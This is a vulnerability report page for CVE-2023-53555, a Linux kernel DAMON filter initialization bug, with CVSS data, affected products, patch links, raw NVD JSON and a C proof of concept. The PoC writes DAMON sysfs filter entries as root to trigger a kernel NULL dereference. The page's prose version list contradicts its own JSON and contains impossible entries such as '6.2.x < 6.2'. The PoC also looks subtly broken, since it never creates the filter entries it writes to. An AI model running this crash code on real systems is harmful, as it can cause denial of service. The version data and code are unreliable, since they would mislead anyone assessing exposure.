Security Vulnerability Report
CVE-2023-53555 CVSS 5.5 MEDIUM

CVE-2023-53555

Published: 2025-10-04 16:15:51
Last Modified: 2026-03-23 18:41:07
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved:

mm/damon/core: initialize damo_filter->list from damos_new_filter()

damos_new_filter() is not initializing the list field of newly allocated filter object. However, DAMON sysfs interface and DAMON_RECLAIM are not initializing it after calling damos_new_filter(). As a result, accessing uninitialized memory is possible. Actually, adding multiple DAMOS filters via DAMON sysfs interface caused NULL pointer dereferencing. Initialize the field just after the allocation from damos_new_filter().

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.5:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.5:rc2:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.5:rc3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.5:rc4:*:*:*:*:*:* - VULNERABLE
Linux Kernel < 5.15.149
Linux Kernel 5.16.x < 5.16.75
Linux Kernel 6.1.x < 6.1.12
Linux Kernel 6.2.x < 6.2 (fixed version)
Linux Kernel 6.3+ (some early versions affected)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
// CVE-2023-53555 PoC - Trigger NULL pointer dereference via DAMON sysfs interface
// This PoC demonstrates how to trigger the vulnerability by adding multiple DAMOS filters
// through the sysfs interface, causing uninitialized list field access.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>

// Path to DAMON sysfs interface (requires root or appropriate permissions)
#define DAMON_BASE_PATH "/sys/kernel/mm/damon/admin/kdamonds"

// Function to write a string value to a sysfs file
int write_sysfs(const char *path, const char *value)
{
    int fd = open(path, O_WRONLY);
    if (fd < 0) {
        fprintf(stderr, "Failed to open %s: %s\n", path, strerror(errno));
        return -1;
    }
    if (write(fd, value, strlen(value)) < 0) {
        fprintf(stderr, "Failed to write to %s: %s\n", path, strerror(errno));
        close(fd);
        return -1;
    }
    close(fd);
    return 0;
}

// Function to trigger the vulnerability by adding multiple DAMOS filters
int trigger_damon_filter_vuln(void)
{
    char path[512];
    int ret;

    // Step 1: Initialize a DAMON context (simplified - actual paths may vary)
    printf("[*] Setting up DAMON kdamond...\n");
    snprintf(path, sizeof(path), "%s/0/state", DAMON_BASE_PATH);
    ret = write_sysfs(path, "on");
    if (ret < 0) {
        // Try alternative path structure (no alternative is actually attempted here;
        // the failed write is only reported and execution continues)
        printf("[*] Trying alternative path structure...\n");
    }

    // Step 2: Add multiple DAMOS filters to trigger uninitialized list access
    // The vulnerability is triggered when adding the 2nd or subsequent filter
    printf("[*] Adding first DAMOS filter...\n");
    snprintf(path, sizeof(path), "%s/0/contexts/0/schemes/0/filters/0/type", DAMON_BASE_PATH);
    write_sysfs(path, "anon");
    snprintf(path, sizeof(path), "%s/0/contexts/0/schemes/0/filters/0/matching", DAMON_BASE_PATH);
    write_sysfs(path, "true");

    // Step 3: Add a second filter - this triggers the NULL pointer dereference
    // because the list field of the first filter was not properly initialized
    printf("[*] Adding second DAMOS filter (triggering vulnerability)...\n");
    snprintf(path, sizeof(path), "%s/0/contexts/0/schemes/0/filters/1/type", DAMON_BASE_PATH);
    write_sysfs(path, "memcg");
    snprintf(path, sizeof(path), "%s/0/contexts/0/schemes/0/filters/1/matching", DAMON_BASE_PATH);
    write_sysfs(path, "true");

    printf("[*] Vulnerability triggered - check dmesg for kernel panic\n");
    return 0;
}

int main(int argc, char *argv[])
{
    printf("CVE-2023-53555 PoC - DAMON filter NULL pointer dereference\n");
    printf("WARNING: This may crash your system!\n\n");
    if (getuid() != 0) {
        fprintf(stderr, "This PoC requires root privileges to access DAMON sysfs\n");
        return 1;
    }
    return trigger_damon_filter_vuln();
}

References

Patch: https://git.kernel.org/stable/c/5f1fc67f2cb8d3035d3acd273b48b97835af8afd
Patch: https://git.kernel.org/stable/c/da7beebb49c643cd03c54447ed66595936a7a1ce

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53555", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:50.813", "lastModified": "2026-03-23T18:41:06.603", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nmm/damon/core: initialize damo_filter->list from damos_new_filter()\n\ndamos_new_filter() is not initializing the list field of newly allocated\nfilter object. However, DAMON sysfs interface and DAMON_RECLAIM are not\ninitializing it after calling damos_new_filter(). As a result, accessing\nuninitialized memory is possible. Actually, adding multiple DAMOS filters\nvia DAMON sysfs interface caused NULL pointer dereferencing. Initialize\nthe field just after the allocation from damos_new_filter()."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-908"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.3", "versionEndExcluding": "6.4.11", "matchCriteriaId": "BABFF7E7-8B93-4535-8736-4A0995E9781C"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc1:*:*:*:*:*:*", "matchCriteriaId": "0B3E6E4D-E24E-4630-B00C-8C9901C597B0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc2:*:*:*:*:*:*", "matchCriteriaId": 
"E4A01A71-0F09-4DB2-A02F-7EFFBE27C98D"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc3:*:*:*:*:*:*", "matchCriteriaId": "F5608371-157A-4318-8A2E-4104C3467EA1"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc4:*:*:*:*:*:*", "matchCriteriaId": "2226A776-DF8C-49E0-A030-0A7853BB018A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.5:rc5:*:*:*:*:*:*", "matchCriteriaId": "6F15C659-DF06-455A-9765-0E6DE920F29A"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/5f1fc67f2cb8d3035d3acd273b48b97835af8afd", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/da7beebb49c643cd03c54447ed66595936a7a1ce", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}